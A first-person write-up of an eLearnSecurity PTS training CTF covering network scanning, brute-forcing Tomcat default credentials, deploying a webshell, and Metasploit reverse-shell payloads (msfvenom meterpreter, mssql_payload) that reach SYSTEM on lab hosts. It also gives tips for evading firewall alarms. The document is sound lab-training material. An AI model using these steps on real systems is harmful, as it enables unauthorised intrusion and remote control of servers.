Here we go.
First CTF from eLearnSecurity's PTS course.
Blackbox szenario.
[Apache Tomcat, SQL Server]
Connected to internal network via eth0.
Task: find flags on all hosts connected to network.
⇒ Tools used: Nmap, Dirb, Netcat & Metasploit (MSFvenom, MSFpayload & Listener for reverse TCP shell)
Stage I - Information Gathering:
was ommitted since we're inside the network and no OSINT or public sites search would be relevant here. If anything subdomain enumeration with sublist3r / amass would have made sense though. Next time.
Stage II - Footprinting and Scanning:
Mapping the network with Nmap.
root@0xBlackhat:~ # nmap -sn 172.16.64.0/24 -oN discovery.nmap
-oN for default output format, redirect with > discovery.nmap would do of course but with this command we actually see the output on the screen. Alternatively fping works, but it won't output anything directly:
fping -a -g 172.16.64.0/24 2>null > test.nmap
root@0xBlackhat:~# cat discovery.nmap | grep for | grep -v “\.10” | cut -d “ ” -f 5 > ipscan.txt
Sorts the discovered addresses, excludes your own IP and writes the rest to a file. ipscan.txt will now be fed to nmap to perform full TCP scan:
root@0xBlackhat:~# nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open
[...snip...]
Nmap scan report for 172.16.64.199
Host is up (0.067s latency).
Not shown: 65433 closed ports, 90 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: WIN10
| NetBIOS_Domain_Name: WIN10
| NetBIOS_Computer_Name: WIN10
| DNS_Domain_Name: WIN10
| DNS_Computer_Name: WIN10
|_ Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-02-08T22:15:06
| Not valid after: 2051-02-08T22:15:06
| MD5: a5b8 5acf 2158 5e33 43c5 3f2e 341e e5fa
|_SHA-1: 8425 8f9f 8d8a 0677 1de5 d232 658e 695e d3d9 7307
|_ssl-date: 2021-02-11T01:13:44+00:00; 0s from scanner time.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49943/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: WIN10
| NetBIOS_Domain_Name: WIN10
| NetBIOS_Computer_Name: WIN10
| DNS_Domain_Name: WIN10
| DNS_Computer_Name: WIN10
|_ Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-02-08T22:15:06
| Not valid after: 2051-02-08T22:15:06
| MD5: a5b8 5acf 2158 5e33 43c5 3f2e 341e e5fa
|_SHA-1: 8425 8f9f 8d8a 0677 1de5 d232 658e 695e d3d9 7307
|_ssl-date: 2021-02-11T01:13:44+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 172.16.64.199:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| nbstat: NetBIOS name: WIN10, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:87:d9:d5 (VMware)
| Names:
| WIN10<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WIN10<20> Flags: <unique><active>
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-11T01:13:38
|_ start_date: 2021-02-08T22:14:56
Victim 1: Apache Tomcat
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
59919/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's identify and exploit any Tomcat misconfigurations we can find.
If you go to the default directory /manager/html for the admin panel use the default credentials. Someone posted the list on GitHub: https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown You can use a bash script to get the hashes like this:
$ for cred in $(cat /home/user/directory/sub_directory/tomcat_userpass.txt); do echo -n $cred | base64; done
which will generate this list here:
YWRtaW46cGFzc3dvcmQ=
YWRtaW46
YWRtaW46UGFzc3dvcmQx
YWRtaW46cGFzc3dvcmQx
YWRtaW46YWRtaW4=
YWRtaW46dG9tY2F0
Ym90aDp0b21jYXQ=
bWFuYWdlcjptYW5hZ2Vy
cm9sZTE6cm9sZTE=
cm9sZTE6dG9tY2F0
cm9sZTpjaGFuZ2V0aGlz
cm9vdDpQYXNzd29yZDE=
cm9vdDpjaGFuZ2V0aGlz
cm9vdDpwYXNzd29yZA==
cm9vdDpwYXNzd29yZDE=
cm9vdDpyMDB0
cm9vdDpyb290
cm9vdDp0b29y
dG9tY2F0OnRvbWNhdA==
dG9tY2F0OnMzY3JldA==
dG9tY2F0OnBhc3N3b3JkMQ==
dG9tY2F0OnBhc3N3b3Jk
dG9tY2F0Og==
dG9tY2F0OmFkbWlu
dG9tY2F0OmNoYW5nZXRoaXM=
ou can then go ahead and use it with BurpSuite's Intruder: Payload type Sniper. Remember to uncheck the URL box.
Somehow Metasploit's bruteforcing with wordlists doesn't work, even if you slow it down. Not a big deal, you can just try your luck manually which actually worked instantly for me using tomcat:s3cret. If I remember correctly their 403 even suggests that combination lol
Ok, so now you have user access to the server. Good enough to upload and deploy files. Tomcat is a java application server and works with WAR files. Fortunately, someone uploaded a war webshell to GitHub. Using our tomcat:s3cret user we go ahead and deploy the websell manually. https://github.com/BustedSec/webshell/blob/master/webshell.war
Now clicking /webshell should be enough to direct us to the webshell. In case it doesn't work straight away append ‘/index.jsp' to the url as follows:
http://172.16.64.101:8080/webshell/index.jsp?cmd=whoami
Great, now we have a user and a shell. Let's go ahead and obtain a reverse shell to obtain root with Metasploit payloads, the reverse tcp shell will help us to bypass the firewall. Meterpreter war payloads don't work for some reason so you can create a Metasploit listener as follows:
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set lhost 172.16.64.10
set lport 59919
run
port 59919 is open on the victim which is why we use this port. A different port would make the firewall fire up alarms, that's why we listen on this port which is open on the victim machine.
Generate the executable with MSFvenom as follows:
root@0xBlackhat:~ # msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=172.16.64.10 lport=59919 -f elf -o meter
Now let's rename the file to meter.war making it a fake war file, it won't change our malicious file but it will allow us to deploy it on the victim machine:
root@0xBlackhat:~ # mv meter meter.war
et's now deploy this file as we previously did with the webshell on the /manager/html page. Deployment won't work, but it's still a valid executable and it's on the server now. All we want.
We rename meter.war through the webshell as follows:
root@0xBlackhat:~ # mv var/lib/tomcat8/webapps/meter.war /tmp/meter
root@0xBlackhat:~ # ls /tmp/meter
root@0xBlackhat:~ # chmod +x /tmp/meter
And we run as follows:
root@0xBlackhat:~ # /tmp/meter
And voila, a new meterpreter session opens up in our terminal. getuid shows we're in. Now it's about surfing the directories which you can and should enumerate. I didn't however, also don't remember where exactly the flag was I think somewhere in /home/user/admin directory or similar.
Victim 2
Webserver:
port 80/tcp open, Apache httpd 2.4.18 (Ubuntu)
So let's enumerate directories with dirb and see what we find.
root@0xBlackhat:~ # dirb http://172.16.64.140
using worlist /usr/share/dirb/wordlists/common.txt
After a while http://172.16.64.140/project/ shows up, let's try admin:admin. Default credentials again and we're in. Now, let's dirb with credentials this time to get a scan with access rights.
root@0xBlackhat:~ # dirb http://172.16.64.140/project -u admin:admin
This will eventually give us a couple more directories to browse and inspect.
One of those contains the credentials to access the SQL Server in the network.
It's also the flag we needed to find.
Victim 3
The SQL Server. Since we already have the credentials it's not too much of a drama.
We can use Metasploit for this, loading mssql_login module
use auxiliary/scanner/mssql/mssql_login
set rhosts 172.16.64.199
set rport 1433
set username fooadmin
set password fooadmin
set verbose true
run
Metaploit's mssql_enum module helps us automate reconnaissance
use auxiliary/admin/mssql/mssql_enum
set password fooadmin
set username fooadmin
set rport 1433
set rhosts 172.16.64.199
run
This is the part that takes some time going through the displayed results. We get a lot of information about the database.
We see e.g. that the account is indeed an system account so we can use this to compromise the server with the mssql_payload module:
use exploit/windows/mssql/mssql_payload
set password fooadmin
set user fooadmin
set srvport 53
set rhosts 172.16.64.199
set payload windows/x64/meterpreter_reverse_tcp
set lhost 172.16.64.13
set lport 443
run
This will upload the payload and a meterpreter session will open in terminal.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Let's spawn a shell and look for the flag
C:\ shell
C:\ cd c:\Users
C: \dir
And that's it. In one of those folders is the last flag.